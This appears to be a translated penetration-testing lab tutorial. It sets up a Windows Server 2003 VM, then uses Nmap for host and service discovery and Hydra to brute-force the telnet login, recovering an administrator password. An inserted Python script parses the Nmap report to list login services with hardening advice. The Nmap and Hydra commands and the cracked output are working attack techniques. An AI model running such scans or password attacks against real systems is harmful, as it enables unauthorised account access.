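Hydra needs no introduction: it is the well-known "nine-headed snake" brute-forcing tool. Many people do not know how to run hydra on Windows, so here I provide the most stable build that works well on Windows: hydra 8.1.
Start a Windows Server 2003 VM and attach it in host-only mode to the virtual adapter VMnet1.
Host-only mode has no Internet access. It is a closed internal network where you can assign any IP addresses, and two hosts can communicate as long as they are on the same subnet.
Open services.msc and start the Telnet service (TCP 23).
Desktop => right-click My Computer => Properties => Remote => enable Remote Desktop (TCP 3389).
My Computer => CD-ROM drive => Install optional Windows components => Application Server => IIS => FTP (TCP 21).
Open IIS and configure the default FTP site: right-click Properties => Security Accounts => disable anonymous access.
Create a new user, which we will use as the target user:
```
net user test testtest /add
```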
Next we introduce Nmap, the software known as the "king of scanners". Its most important common options are:
Option | Function |
---|---|
-sP | Ping scan |
-p | Port range to scan |
-sV | Service version detection |
-O | Enable operating system detection |
-A | Comprehensive scan |
-oN | Save the output as a text file |
Scan the 192.168.241.0/24 segment for live hosts:
```
C:\Users\Administrator>nmap -sP 192.168.241.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:06 ?D1ú±ê×?ê±??
Stats: 0:00:22 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 255 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
MAC Address: 00:0C:29:E9:24:06 (VMware)
Nmap scan report for 192.168.241.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E0:96:74 (VMware)
Nmap scan report for 192.168.241.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 22.80 seconds
```
Detect the operating system and related information of 192.168.241.128:
```
C:\Users\Administrator>nmap -O 192.168.241.128
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:09 ?D1ú±ê×?ê±??
Stats: 0:00:18 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.241.128
Host is up (0.00055s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1048/tcp open neod2
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:E9:24:06 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.75 seconds
```
Detect the operating system and related information of 192.168.241.128 and save the report to D:\baogao.txt:
```
C:\Users\Administrator>nmap -O 192.168.241.128 -oN d:\baogao.txt
```
Probe specific ports on 192.168.241.128:
```
C:\Users\Administrator>nmap -p 21,23,80 192.168.241.128
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:12 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp closed http
MAC Address: 00:0C:29:E9:24:06 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.14 seconds
```
Probe specific ports on 192.168.241.128 and detect the service versions at the same time:
```
C:\Users\Administrator>nmap -p 21,23 192.168.241.128 -sV
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:15 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet Microsoft Windows XP telnetd
MAC Address: 00:0C:29:E9:24:06 (VMware)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.06 seconds
```
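The report saved with `-oN` can also be read from the defender's side. The following Python code is an added example, not part of the original post: it parses Nmap normal-output text and lists the open services that accept logins, with a hardening note for each. The sample report is constructed from the scan output shown above, and the `LOGIN_SERVICES` mapping and its advice strings are assumptions of this example.

```python
import re

# Constructed sample: port lines taken from the scans shown above, in -oN layout.
SAMPLE_REPORT = """\
# Nmap 7.40 scan initiated (constructed header line)
Nmap scan report for 192.168.241.128
Host is up (0.00055s latency).
PORT     STATE  SERVICE
21/tcp   open   ftp
23/tcp   open   telnet
80/tcp   closed http
135/tcp  open   msrpc
445/tcp  open   microsoft-ds
3389/tcp open   ms-wbt-server
MAC Address: 00:0C:29:E9:24:06 (VMware)
"""

# Assumption: this mapping is constructed for the example from the login
# protocols the page lists (telnet, rdp, smb, ftp, ssh, mysql), keyed by the
# service names Nmap prints for them.
LOGIN_SERVICES = {
    "ftp": "cleartext login; disable it or move to SFTP/FTPS",
    "telnet": "cleartext login; disable it and use SSH",
    "ms-wbt-server": "RDP login; restrict source IPs, enforce account lockout",
    "microsoft-ds": "SMB login; block at the perimeter, enforce account lockout",
    "ssh": "password login; prefer keys and rate-limit attempts",
    "mysql": "database login; bind to localhost or an admin network",
}

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_report(text):
    """Return {host: [(port, proto, state, service), ...]} from -oN text."""
    hosts, current = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if (m := HOST_RE.match(line)):
            current = hosts.setdefault(m.group(1), [])
        elif (m := PORT_RE.match(line)) and current is not None:
            current.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return hosts

def audit(text):
    """List (host, port, service, advice) for open services that accept logins."""
    return [(host, port, svc, LOGIN_SERVICES[svc])
            for host, ports in parse_report(text).items()
            for port, _proto, state, svc in ports
            if state == "open" and svc in LOGIN_SERVICES]

if __name__ == "__main__":
    for host, port, svc, advice in audit(SAMPLE_REPORT):
        print(f"{host}:{port} {svc}: {advice}")
```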
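Once the information scan is complete, we can start brute-forcing.
Here we use hydra version 8.1 (which runs relatively well on Windows).
Option | Function |
---|---|
-R | Resume cracking from the previous session's progress |
-S | Connect over SSL |
-s | Specify a non-default port |
-l | Specify the user to crack (target one particular user) |
-L | Specify a username dictionary |
-p | Specify a single password to try |
-P | Specify a password dictionary |
-e | n: try an empty password; s: try the login name as the password |
-C | Use a colon-separated format such as "login:password" instead of the -L/-P options |
-M | Specify a target list file, one entry per line |
-o | Specify the output file for results |
-f | When used with -M, stop cracking once the first login/password pair is found |
-t | Number of threads to run in parallel, default 16 |
-w | Maximum timeout in seconds, default 30s |
-v /-V | Show verbose progress |
The protocol to brute-force can be telnet, rdp, smb (that is, CIFS sharing on port 445), ftp, ssh, or mysql.
It is recommended to configure the environment variable so that hydra can be invoked directly.
On the physical host, create a txt file on the D: drive. This is our password dictionary, pass.txt, containing n lines of passwords.
Then open a console and type:
```
hydra -l administrator -P d:\pass.txt 192.168.241.128 telnet
```
This means: brute-force the telnet service on that IP using the user administrator together with the pass.txt dictionary.
The crack succeeds: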
```
C:\>hydra -l administrator -P d:\pass.txt 192.168.241.128 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-11-08 21:05:03
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 48 login tries (l:1/p:48), ~0 tries per task
[DATA] attacking service telnet on port 23
[23][telnet] host: 192.168.241.128 login: administrator password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-11-08 21:05:28
```
Password obtained: login: administrator password: 123456